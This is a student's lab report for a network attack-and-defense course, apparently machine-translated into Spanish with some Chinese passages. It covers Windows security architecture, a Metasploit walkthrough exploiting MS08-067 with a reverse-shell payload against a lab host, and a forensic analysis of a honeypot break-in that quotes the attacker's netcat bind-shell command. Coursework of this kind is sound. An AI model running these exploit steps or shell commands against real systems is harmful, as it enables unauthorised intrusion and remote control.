20199128 2019-2020-2 "Asignación de red y práctica de defensa" Asignación de la semana 7

1. Practica el contenido
2. Proceso de práctica
3. Problemas encontrados en el aprendizaje y las soluciones.
4. Resumen de la práctica
Referencias


¿A qué curso pertenece esta tarea?	"Ataque de red y práctica de defensa"
¿Cuáles son los requisitos para esta tarea?	Semana 7 de "Práctica de ataque y defensa de la red"
¿Qué aspecto específico de esta tarea me ayudó a lograr mi objetivo?	Aprenda el conocimiento del ataque y defensa de seguridad del sistema operativo Windows
Tarea ...	Ver texto
Otras referencias	Ver referencias

1. Practica el contenido

1. El marco básico del sistema operativo Windows

Estructura básica: se divide en un núcleo del sistema operativo que se ejecuta en el modo privilegiado del procesador y un código de espacio de usuario que se ejecuta en el modo no privilegiado del procesador. El primero incluye: cuerpo ejecutivo de Windows, cuerpo de kernel de Windows, controlador de dispositivo, capa de abstracción de hardware, ventana de Windows y código de implementación del kernel de interfaz de interfaz gráfica; el último incluye: proceso de soporte del sistema, proceso de servicio del subsistema ambiental, proceso de servicio, software de aplicación de usuario, DLL del subsistema central.
Proceso de Windows y mecanismo de gestión de subprocesos: el proceso se considera como un contenedor cuando el programa ejecutable se ejecuta en el sistema Windows. El proceso incluye un descriptor de espacio de memoria virtual, una lista de identificadores de objetos de recursos del sistema, un token de acceso de seguridad y un hilo de ejecución. El subproceso se utiliza como un proveedor específico para la ejecución de instrucciones en el sistema Windows. Su bloque de control de subprocesos TCB contiene la información de contexto de la ejecución del programa, etc., y comparte el espacio de direcciones virtuales, la lista de recursos y el token de acceso de seguridad del proceso.
Mecanismo de administración de memoria de Windows: la memoria virtual se divide en el intervalo de memoria central del sistema y el intervalo de memoria del usuario. Los programas en modo de usuario no pueden acceder directamente al primero.
Mecanismo de administración de archivos de Windows: se adopta el sistema de archivos NTFS y el archivo ejecutable está en formato PE.
Mecanismo de administración del registro de Windows: es un almacén de almacenamiento para la configuración global del sistema, la información de configuración del usuario y del software de la aplicación.
Mecanismo de red de Windows: controlador de dispositivo de hardware de tarjeta de red (capa física), biblioteca NDIS y controlador de minipuerto (capa de enlace), TDI (capa de transporte), API de red DLL y cliente TDI (capa de sesión y capa de presentación), aplicación de red Y proceso de servicio (capa de aplicación).

2. La arquitectura de seguridad y el mecanismo del sistema operativo Windows

Modelo de monitor de referencia: todos los objetos de acceso del sujeto del sistema deben usar el monitor de referencia como intermediario, lo que autorizará el acceso, y todos los registros de acceso también generarán registros de auditoría.
Arquitectura de seguridad de Windows: el monitor de referencia de seguridad SRM en el kernel y el servicio de seguridad LSASS en modo de usuario, junto con servicios como Winlogon / Netlogon y Eventlog, implementan el mecanismo de autenticación de identidad para el usuario sujeto y el mecanismo de control de acceso para todos los objetos de recursos Y el mecanismo de auditoría de seguridad para el acceso.
Mecanismo de autenticación de identidad de Windows: Windows establece la cuenta como el entorno de ejecución del sujeto de seguridad para ejecutar el código del programa. La función fundamental de la autoridad de la cuenta es restringir el acceso del programa que se ejecuta en la cuenta a los objetos de recursos del sistema. Windows admite la autenticación de identidad local y la autenticación de identidad de red.
Autorización de Windows y mecanismo de control de acceso: según el modelo de monitor de referencia, el módulo SRM en el núcleo y el servicio LSASS en modo de usuario se implementan juntos, y SRM se utiliza como intermediario cuando el sujeto de seguridad accede al recurso de destino, y el acceso autorizado se realiza de acuerdo con la lista de control de acceso establecida .
Mecanismo de auditoría de seguridad de Windows: el administrador del sistema define la estrategia de auditoría del sistema en la estrategia de seguridad local para determinar el sistema para registrar esas prácticas.
Otros mecanismos de seguridad: Windows Security Center, mecanismo de carga y verificación de IPsec, sistema de archivos cifrados EPS, mecanismo de protección de archivos, protección de la privacidad proporcionada por el navegador IE incluido y mecanismo de protección de seguridad del navegador, etc.

3. Tecnología de defensa y ataque de seguridad remota de Windows

Incluyendo ataques de descifrado y descifrado de contraseñas remotas, ataques de servicio de red de Windows, ataques de clientes y usuarios de Windows.
Proceso de ataque de prueba de penetración para objetivos específicos
- Prueba de escaneo de vulnerabilidad: prueba de escaneo en el sistema de destino para descubrir si hay vulnerabilidades de seguridad conocidas en el sistema.
- Encuentre el código de penetración de la vulnerabilidad: de acuerdo con la información del índice en la base de datos de información de vulnerabilidad de seguridad, encuentre los recursos del código de ataque para las vulnerabilidades de seguridad que se han escaneado en la comunidad de seguridad.
- Implementar pruebas de penetración: después de encontrar el código de penetración, se puede implementar un ataque de penetración. Pero el éxito depende de si el código y el entorno de destino coinciden.
Pruebas de penetración de Metasploit: metasploit contiene un módulo de vulnerabilidades que explota vulnerabilidades de seguridad, un módulo auxiliar que se encarga de escanear y enumerar, un módulo de carga útil que se encarga de implantar shellcode (código ejecutado por vulnerabilidades de software) en el sistema de destino, un módulo que puede evitar la detección de codificadores y ataques Nops y otros módulos llenos de cargas y varias interfaces.
Adivinación de contraseña remota de Windows y ataque de craqueo
- Adivinación de contraseña remota: servicios de red, protocolo SMB, servicio WMI, servicio de terminal de escritorio remoto TS, servicio de base de datos MS SQL, SharePoint, etc. que a menudo sufren tales ataques.
- Comunicación remota de intercambio de contraseñas para espiar y descifrar: Windows necesita intercambiar información en Internet al verificar la identidad de los usuarios de la red, por lo que se puede descifrar al espiar la comunicación de intercambio de contraseñas de la red.
- Medidas preventivas
  - Intente cerrar servicios innecesarios de red abierta;
  - Configure el firewall del host para restringir los servicios de ciertos puertos;
  - Use el firewall de red para restringir el acceso a los servicios anteriores;
  - Mantenga las ventanas actualizadas para corregir errores;
  - Formule e implemente una estrategia de contraseña segura. .
Ataque de penetración del servicio remoto de Windows: El servicio de red proporcionado por el puerto abierto predeterminado de Windows es el objetivo principal del ataque y la propagación de código malicioso.

4. Tecnología de defensa y ataque de seguridad local de Windows

Escalada de privilegios locales de Windows: tecnología de ataque que intenta obtener cuentas privilegiadas de derechos de usuario restringidos. Principalmente a través de la inyección de DDL y crackear vulnerabilidades de seguridad del programa local. Precauciones: parchear y rastrear las advertencias de seguridad del proveedor.
Robo de información confidencial de Windows: la tecnología de extracción de texto cifrado de contraseña del sistema de Windows, la tecnología de descifrado de contraseña del sistema de Windows, el robo de información confidencial de los usuarios, etc. Medidas preventivas: elija una buena contraseña.
Windows desaparece y desaparece: cubra la intrusión cerrando la función de auditoría y borrando el registro de eventos. Medidas preventivas: registros de registro de respaldo.
Control remoto de Windows y programas de puerta trasera: use herramientas de control remoto de línea de comando, herramientas gráficas de control remoto, etc. para implantar programas de control remoto y puerta trasera en el sistema para mantener el control permanente del host. Medidas preventivas: software de detección de puerta trasera.

2. Proceso de práctica

Tarea 1: utilizar el software metasploit para realizar experimentos de estadísticas de penetración remota en Windows

具体任务内容：使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击，获取目标主机的访问权

Máquina de ataque kali: 192.168.200.2
Máquina de
destino Win2k: 192.168.200.124 1. Ingrese msfconsole en la terminal de kali para iniciar metasploit
2. Seleccione el módulo de penetración para la vulnerabilidad ms08-067, use exploit/windows/smb/ms08_067_netapi
3. Seleccione el módulo de carga de ataque aplicable, set PAYLOAD generic/shell_reverse_tcp
4. Configure el ataque de penetración IP del atacante e IP objetivo, set LHOST 192.168.200.2y set RHOST 192.168.200.124
5. Seleccione el tipo de plataforma de sistema operativo objetivo del módulo de ataque de penetración, set TARGET 0
6. Implemente el ataque de penetración, exploit
7. Verificación exitosa del ataque,ipconfig

Tarea 2: Práctica del análisis forense: decodificar un ataque exitoso del sistema NT

来自213.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106（主机名为：lab.wiretrip.net）；回答下面的问题：

1、攻击者使用了什么破解工具进行攻击？

2、攻击者如何使用这个破解工具进入并控制了系统？

3、当攻击者获得系统的访问权后做了什么？

4、我们如何防止这样的攻击？

5、你觉得攻击者是否警觉了他的目标是一台蜜罐主机？如果是，为什么？

1. Wireshark abre el archivo .log, Estadísticas-> HTTP-> Solicitudes

Filtre por condiciones ip.addr == 213.116.251.162 && ip.addr == 172.16.1.106, busque el paquete No.117, busque el inicio boot.ini y la codificación Unicode% C0% AF

No 130 y 140 contienen msadc, lo que indica que la detección continúa

No.149, rastree la secuencia tcp, puede ver la cadena "ADM! ROX! YOUR! WORLD" y dbq = c: \ winnt \ help \ iis \ htm \ tutorial \ btcustmr.mdb en la instrucción de consulta. , Este ataque fue lanzado por el código de penetración msadc (2) .pl escrito por rain forest puppy

2. El seguimiento del flujo de TCP para el No.179, vio que el atacante escribió el usuario de eco johna2k> ftpcom

para rastrear el flujo de TCP para el No.229, y descubrió que el atacante intentó conectarse al servidor ftp en vano. El

No.1106 no se conectó con éxito al ftp

No.1224 Rastree el flujo tcp, y aprenda que el atacante escribió 1.exe / c nc -l -p 6969 -e y luego ejecute 1.exe

3. Filtre por condición tcp.port == 6969, rastree el flujo tcp, puede ver el siguiente comportamiento del atacante

Deshabilite servicios como RDS innecesarios.
El firewall bloquea las conexiones iniciadas por los servidores dentro de la red.
Establezca el directorio raíz virtual en un volumen de archivo separado para el servidor web.
Use el sistema de archivos NTFS porque FAT proporciona pocas características de seguridad.
Use herramientas como IIS Lockdown y URLScan para fortalecer el servidor web.

5. El atacante encontró y dejó un cumplido

Tarea 3: Práctica de confrontación en equipo: análisis y ataque de penetración remota del sistema Windows

攻击方使用metaploit选择漏洞进行渗透攻击，获得控制权。
防守方使用wireshark监听获得网络攻击的数据包，结合分析过程，获得攻击者IP地址、目的IP地址和端口、攻击发起时间、攻击利用漏洞、攻击使用的shellcode，以及本地执行的命令输入信息。

El proceso de ataque es como la tarea Uno. La siguiente es la captura de paquetes de Wirehark

3. Problemas encontrados en el aprendizaje y las soluciones.

Pregunta 1: Ataque fallido en MS08-067
Solución del problema 1: cambie la carga a genérico / shell_reverse_tcp

4. Resumen de la práctica

Hay grandes deficiencias en el registro de análisis.

Referencias

Demostrar el uso de Metasploit para invadir Windows